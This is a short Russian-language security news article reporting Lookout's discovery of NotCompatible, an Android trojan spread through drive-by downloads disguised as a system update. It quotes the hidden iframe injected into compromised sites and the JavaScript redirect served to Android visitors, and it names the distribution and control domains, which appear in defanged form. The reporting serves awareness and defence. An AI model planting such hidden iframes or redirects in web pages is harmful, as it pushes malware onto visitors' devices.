Впервые обнаружено вредоносное ПО для Android, которое распространяется через drive-by загрузки. Зловред безвреден. По мнению специалистов, злоумышленники осуществляют эксперимент для проверки эффективности нового вектора атаки.
Троян, получивший название NotCompatible, загружается на Android-устройство при посещении инфицированного сайта. После скачивания файла Update.apk пользователю предлагают установить программу на свой компьютер под видом системного обновления. При этом в системе должна быть также разрешена установка программ из неизвестных источников.
Новый зловред обнаружен сотрудниками компании Lookout. Они предупреждают, что в будущем drive-by загрузки могут появиться на любом сайте. В данном случае на заражённые страницы внедрялся фрейм:
<iframe style="visibility: hidden; display: none; display: none;" src="https://xakep.ru/wp-content/uploads/post/58652/hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}"></iframe>
Вредоносная программа не проявляет себя при визите пользователя под операционными системами Windows, Linux, OS X или iOS, а реагирует только на user agent, который указывает на Android. В этом случае устройство получает такой код:
<html><head></head><body><script type="text/javascript">window.top.location.href = "hxxp://androidonlinefix.info/fix1.php";</script></body></html>
Отсюда автоматически начинается скачивание Update.apk.
Вряд ли можно предположить, что NotCompatible поразит большое количество устройств, тем более он распространяется через небольшое количество сайтов с малой посещаемостью. Это чистого рода эксперимент, чтобы оценить эффективность атаки. Своего рода маркетинговое исследование.
Распространение Update.apk в данный момент идёт с сайтов gaoanalitics.info и androidonlinefix.info, а управляющий сервер находится на notcompatibleapp.eu.
